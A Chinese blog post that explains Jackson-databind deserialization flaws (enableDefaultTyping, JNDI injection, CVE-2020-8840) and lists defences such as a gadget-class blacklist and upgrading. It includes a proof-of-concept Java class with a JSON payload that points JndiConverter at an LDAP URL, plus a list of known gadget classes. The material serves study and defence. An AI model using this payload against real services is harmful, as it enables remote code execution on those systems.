enableDefaultTyping的jackson反序列化漏洞介绍

最新推荐文章于 2024-09-24 20:11:00 发布
最新推荐文章于 2024-09-24 20:11:00 发布
阅读量5.9k 收藏 5
点赞数 3
分类专栏: Java SpringBoot
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzhongcy/article/details/105815697
版权
Java 同时被 2 个专栏收录
110 篇文章 10 订阅
订阅专栏
SpringBoot
101 篇文章 15 订阅
订阅专栏
本文深入探讨Jackson-databind的反序列化漏洞,包括DefaultTyping类型详解、NON_FINAL特性引发的安全问题、JNDI注入原理及最新的CVE-2020-8840漏洞分析。提供防御策略如黑名单类、配置CacheManager及保持软件更新。
摘要由CSDN通过智能技术生成

最近查看到jackson反序列化漏洞的问题,网上查了查资料,这里记录一下

1. DefaultTyping类型

public static enum DefaultTyping {
    JAVA_LANG_OBJECT,
    OBJECT_AND_NON_CONCRETE,
    NON_CONCRETE_AND_ARRAYS,
    NON_FINAL,
    EVERYTHING;
    private DefaultTyping() {
    }
}

 DefaultTyping有四个选项:

JAVA_LANG_OBJECT: 当对象属性类型为Object时生效;

OBJECT_AND_NON_CONCRETE: 当对象属性类型为Object或者非具体类型(抽象类和接口)时生效;

NON_CONCRETE_AND+_ARRAYS: 同上, 另外所有的数组元素的类型都是非具体类型或者对象类型;

NON_FINAL: 对所有非final类型或者非final类型元素的数组。

因此,当开启DefaultTyping后,会开发者在反序列化时指定要还原的类,过程中调用其构造方法setter方法或某些特殊的getter方法,当这些方法中存在一些危险操作时就造成了代码执行。

 

2. 反序列化漏洞说明

上面提到了NON_FINAL ,这里再说一下关于它的反序列化漏洞:

NON_FINAL ,包含即将被序列化的类里的全部、非final的属性,也就是相当于整个类、除final外的的属性信息都需要被序列化和反序列化。

enableDefaultTyping的NON_FINAL这个功能涉及到java著名的反序列化漏洞。各位系统之间调用数据的项目还是慎重使用.
漏洞详情

我们的服务器数据都是通过安全认证进行存储的,所以这里不存在这个漏洞。

如果数据能够让用户自己数据和存储,大家就要注意这个漏洞了!!!

2.1 漏洞描述

近日,云安全团队跟踪到jackson-databind在github上更新了一个新的反序列化利用类com.caucho.config.types.ResourceRef,issue编号2660,该类绕过了之前jackson-databind维护的黑名单类。如果项目中包含resin-kernel库,并且JDK版本较低的话,请及时升级jackson-databind到安全版本。

2.2. 影响范围

jackson-databind < 2.9.10.4

JDK < 6u201、7u191、8u182、11.0.1(LDAP)

2.3 漏洞分析

     该漏洞本质是java的JNDI注入,我们先来了解下JNDI基础知识。简单来说,JNDI是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。比如可以利用JNDI在局域网上定位一台打印机,也可以用JNDI来定位数据库服务或一个远程Java对象。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。JNDI接口在初始化时,可以将RMI URL作为参数传入,而JNDI注入就出现在客户端的lookup()函数中,如果lookup()的参数可控就可能被攻击。

    因此分析的时候,可以直接先搜索受影响类的lookup方法,看看漏洞入口在哪里,本文复现的时候用的是resin-kernel-4.0.52版本。

参考:https://anquan.baidu.com/article/1069

 

Jackson原生框架是没有存在直接漏洞利用的类的,我们需要引入一些外部类去构造Gadget

CVE-2020-8840

这个CVE利用xbean-reflect利用链造成JNDI注入
影响版本:2.0.0 - 2.9.10.2

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

package com.patrilic.jackson;

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class poc {
    public static void main(String args[]) throws IOException {
        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";

        mapper.readValue(json, Object.class);

    }
}

跟一下流程:
调用mapper.readValue()的时候,return _readMapAndClose

步入_readMapAndClose,经过读取json,配置DeserializationContext最终到else分支

调用了deser.deserialize(p, ctxt)

继续Step Into,直到跟到
com/fasterxml/jackson/databind/deser/BeanDeserializer.class#deserialize

到这里也就是之前熟悉的Jackson反序列化流程了,继续步入到
com/fasterxml/jackson/databind/deser/BeanDeserializer.class

 

 

通过setter.invoke()执行方法,步入eval类
org/apache/xbean/propertyeditor/JndiConverter.class


进行lookup(), 造成JNDI注入

完整调用链

6 解决反序列化漏洞的方法

官方在github的更新措施(https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15),

仍然是添加com.caucho.config.types.ResourceRef为黑名单类,但这种方式治标不治本,后续可能出现其他绕过黑名单的gdaget。

6.1 黑名单类:

或者:


Set<String> s = new HashSet<String>();
// Courtesy of [https://github.com/kantega/notsoserial]:
// (and wrt [databind#1599])
s.add("org.apache.commons.collections.functors.InvokerTransformer");
s.add("org.apache.commons.collections.functors.InstantiateTransformer");
s.add("org.apache.commons.collections4.functors.InvokerTransformer");
s.add("org.apache.commons.collections4.functors.InstantiateTransformer");
s.add("org.codehaus.groovy.runtime.ConvertedClosure");
s.add("org.codehaus.groovy.runtime.MethodClosure");
s.add("org.springframework.beans.factory.ObjectFactory");
s.add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
s.add("org.apache.xalan.xsltc.trax.TemplatesImpl");
// [databind#1680]: may or may not be problem, take no chance
s.add("com.sun.rowset.JdbcRowSetImpl");
// [databind#1737]; JDK provided
s.add("java.util.logging.FileHandler");
s.add("java.rmi.server.UnicastRemoteObject");

// [databind#1737]; 3rd party
//s.add("org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor"); // deprecated by [databind#1855]
s.add("org.springframework.beans.factory.config.PropertyPathFactoryBean");

// s.add("com.mchange.v2.c3p0.JndiRefForwardingDataSource"); // deprecated by [databind#1931]
// s.add("com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"); // - "" -
// [databind#1855]: more 3rd party
s.add("org.apache.tomcat.dbcp.dbcp2.BasicDataSource");
s.add("com.sun.org.apache.bcel.internal.util.ClassLoader");
// [databind#1899]: more 3rd party
s.add("org.hibernate.jmx.StatisticsService");
s.add("org.apache.ibatis.datasource.jndi.JndiDataSourceFactory");
// [databind#2032]: more 3rd party; data exfiltration via xml parsed ext entities
s.add("org.apache.ibatis.parsing.XPathParser");

// [databind#2052]: Jodd-db, with jndi/ldap lookup
s.add("jodd.db.connection.DataSourceConnectionProvider");

// [databind#2058]: Oracle JDBC driver, with jndi/ldap lookup
s.add("oracle.jdbc.connector.OracleManagedConnectionFactory");
s.add("oracle.jdbc.rowset.OracleJDBCRowSet");

// [databind#2097]: some 3rd party, one JDK-bundled
s.add("org.slf4j.ext.EventData");
s.add("flex.messaging.util.concurrent.AsynchBeansWorkManagerExecutor");
s.add("com.sun.deploy.security.ruleset.DRSHelper");
s.add("org.apache.axis2.jaxws.spi.handler.HandlerResolverImpl");

// [databind#2186]: yet more 3rd party gadgets
s.add("org.jboss.util.propertyeditor.DocumentEditor");
s.add("org.apache.openjpa.ee.RegistryManagedRuntime");
s.add("org.apache.openjpa.ee.JNDIManagedRuntime");
s.add("org.apache.axis2.transport.jms.JMSOutTransportInfo");

// [databind#2326] (2.9.9)
s.add("com.mysql.cj.jdbc.admin.MiniAdmin");

// [databind#2334]: logback-core (2.9.9.1)
s.add("ch.qos.logback.core.db.DriverManagerConnectionSource");

// [databind#2341]: jdom/jdom2 (2.9.9.1)
s.add("org.jdom.transform.XSLTransformer");
s.add("org.jdom2.transform.XSLTransformer");

// [databind#2387]: EHCache
s.add("net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup");

// [databind#2389]: logback/jndi
s.add("ch.qos.logback.core.db.JNDIConnectionSource");

6.2 配置CacheManger

网上发现了一个更优雅的解决方案分享给大家。没有实际用过,只供参考
只需要在配置文件中配置一下CacheManger,使用jackson的一个带泛型的序列化工具实现。

    /**
     * spring cache 注解相关序列化操作
     */
    @Bean
    public CacheManager cacheManager(RedisConnectionFactory factory) {
        GenericJackson2JsonRedisSerializer genericJackson2JsonRedisSerializer = new GenericJackson2JsonRedisSerializer();
        StringRedisSerializer stringRedisSerializer = new StringRedisSerializer();
        // 配置序列化
        RedisCacheConfiguration config = RedisCacheConfiguration.defaultCacheConfig();
        RedisCacheConfiguration redisCacheConfiguration = config
                // 键序列化方式 redis字符串序列化
                .serializeKeysWith(RedisSerializationContext.SerializationPair.fromSerializer(stringRedisSerializer))
                // 值序列化方式 简单json序列化
                .serializeValuesWith(RedisSerializationContext.SerializationPair.fromSerializer(genericJackson2JsonRedisSerializer));
        return RedisCacheManager.builder(factory).cacheDefaults(redisCacheConfiguration).build();

    }

6.3 其他防御措施

1.  及时将jackson-databind升级到安全版本(>=2.9.10.4,> 2.10.0);

2.  升级到较高版本的JDK。

 

7. 参考:

https://patrilic.top/2020/03/24/Jackson-databind%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%20(CVE-2020-8840)/

https://www.leadroyal.cn/?p=594

http://www.lmxspace.com/2019/07/30/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B1%87%E6%80%BB/

 

CVE-2020-36189 jackson-databind java反序列化漏洞
mirocky的博客
10-13 3204
该方法允许json字符串中指定反序列化java对象的类名,而在使用Object、Map、List等对象时,可诱发反序列化漏洞,导致可执行任意命令。com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类中实现了url的输入和调用,通过可控的url进行payload的打入,即可依靠ObjectMapper的反序列化漏洞实现SSRF和RCE。,}]的形式,将对象的参数的类名打印,是json中的类名。
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
JiangBuLiu的博客
07-10 8363
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
Redis配置序列化反序列化Jackson ObjectMapper 中的 enableDefaultTyping 方法从 2.10.0 开始标记为过期
流沙QuickSand
10-05 3769
Redis配置序列化反序列化Jackson ObjectMapper 中的 enableDefaultTyping 方法从 2.10.0 开始标记为过期
Jackson 反序列化漏洞
qq_50296568的博客
08-07 1413
CVE-2017-7525 是 Jackson 数据绑定库(jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
redis序列化数据时,如何包含clsss类型信息?
最新发布
gzyes
09-24 463
通过配置 `com.fasterxml.jackson.databind.ObjectMapper` 的 `enableDefaultTyping` 方法,可以使序列化后的 JSON 包含类信息。 大家可能留意过,在redis里缓存的数据经常有下面两种形式。不难发现,这两者的区别就是后者包含了JavaObject类型信息。 {"levyName":"test","levyCode"...
jackson框架java反序列化漏洞_Jackson enableDefaultTyping 方法反序列化代码执行漏洞(CVE-2017-7525)...
weixin_35983968的博客
02-23 499
Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed a...
jackson.ObjectMapper里enableDefaultTyping方法过期
阿正的梦工坊
07-04 4633
踩坑
Jackson 使用 defaultTyping 实现通用的序列化和反序列化
weixin_34055787的博客
06-06 1895
Jackson 使用 defaultTyping 实现通用的序列化和反序列化 核心 private ObjectMapper createObjectMapping() { ObjectMapper objectMapper = new ObjectMapper(); objectMapper.setVisibility(...
enableDefaultTyping过期
q18770158319的博客
05-02 1175
objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);过期 修改为 objectMapper.activateDefaultTyping(LaissezFaireSubTypeValidator.instance , ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
Jackson-databind 反序列化漏洞(CVE-2017-7525)
玄道的网安博客
06-17 3764
漏洞原理 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。 所以,本漏洞利用条件如下: 开启 Jackso
[JAVA安全]JACKSON反序列化
snowlyzz的博客
01-28 2093
JACKSON反序列化原理
jackson.ObjectMapper里的一个enableDefaultTyping方法过期
每天进步一点
04-13 1万+
jackson.ObjectMapper里的一个enableDefaultTyping方法过期了,项目每次编译时提示,同时过期可能是有漏洞或者效率太低了,总而言之最好处理下 看了下网上也没有解决方案,我这边记录下解决方案。 最好的解决办法就是看过期方法的源码,一般过期方法会给出新的方法来替换过期方法的说明 可以看到@link 里已经给出了这个说明。 我这边修改的: ...
RedisTemplate配置的jackson.ObjectMapper里的一个enableDefaultTyping方法过期解决
热门推荐
zzhongcy的专栏
04-28 3万+
1、前言 最近升级SpringBoot,从2.1.6版本升级到2.2.6版本,发现enableDefaultTyping方法过期过期了。 该方法是指定序列化输入的类型,就是将数据库里的数据安装一定类型存储到redis缓存中。 2、为什么要指定序列化输入类型 2.1、没有指定序列化输入类型 如果注释掉enableDefaultTyping(ObjectMapper.DefaultTyp...
enableDefaultTyping is deprecated这个方法已经被弃用
瞭望的叶子的专栏
03-08 1万+
起因是使用 objectMapper.enableDefaultTyping()方法是发现被弃用。 建议使用 objectMapper.activateDefaultTyping()方法替代它。
Redis 遇到enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL)过期
qq_31247573的博客
06-19 3800
项目中 遇到这个 方法过期 查看后 更改 为 activateDefaultTyping(LaissezFaireSubTypeValidator.instance , ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY)
springboot RedisTemplate 提示没有双引号序列化失败问题
wangyongpro的博客
09-03 879
/** * retemplate相关配置 * @param factory * @return */ @Bean public RedisTemplate<String, Object> redisTemplate(RedisConnectionFactory factory) { RedisTemplate<String, Object> template = new RedisTemplate<&..
阿里巴巴fastjson版本从1.2.72升级到2.0.14。开启autoType,不支持Object对象接收强转成Java对象的解决方案。
netuser1937的博客
09-22 8713
阿里巴巴fastjson版本从1.2.72升级到2.0.14。开启autoType,不支持Object对象接收强转成Java对象的解决方案。
Java与Jackson反序列化漏洞深度解析
"深入解析JAVA及Jackson反序列化漏洞" 本文主要探讨了Java和Jackson库的反序列化原理,以及相关的安全问题。Java反序列化是一个关键的编程概念,它允许将对象的状态转换为字节流,以便存储或在网络中传输,然后在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值